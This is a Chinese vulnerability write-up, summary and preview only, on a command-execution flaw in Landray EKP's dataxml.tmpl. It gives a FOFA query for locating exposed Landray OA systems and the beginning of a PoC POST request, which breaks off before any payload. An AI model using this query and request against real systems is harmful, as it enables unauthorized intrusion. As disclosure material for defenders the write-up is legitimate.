主要观点总结
本文介绍了关于蓝凌EKP dataxml.tmpl存在的命令执行漏洞的详细信息,包括漏洞描述、复现步骤以及相关的技术知识和公司背景。
关键观点总结
关键观点1: 警告和免责声明
文章开头明确了阅读须知,提醒读者所提供的技术资料仅供参考,未经授权不得用于入侵操作,且文中所提及的工具仅供学习使用。
关键观点2: 漏洞描述
文章指出了蓝凌EKP dataxml.tmpl存在的命令执行漏洞,这是文章的主要关注点。
关键观点3: 漏洞复现步骤
文章提供了如何利用fofa工具找到目标系统并复现漏洞的详细步骤,包括执行poc进行ping dnslog服务器和nuclei验证脚本的使用。
关键观点4: 公司简介
文章最后介绍了江西渝融云安全科技有限公司的背景、资质荣誉以及所从事的业务范围。
文章预览
0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提 供的工具仅用于学习,禁止用于 其他! ! ! 0x02 漏洞描述 蓝凌 EKP dataxml.tmpl存在命令执行漏洞。 0x03 漏洞复现 fofa:app="Landray-OA系统" 1.执行poc进行ping dnslog服务器,得到结果 POST /ekp/data/sys-common/dataxml.tmpl HTTP/1.1 Host: User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding : gzip, deflate Conn
………………………………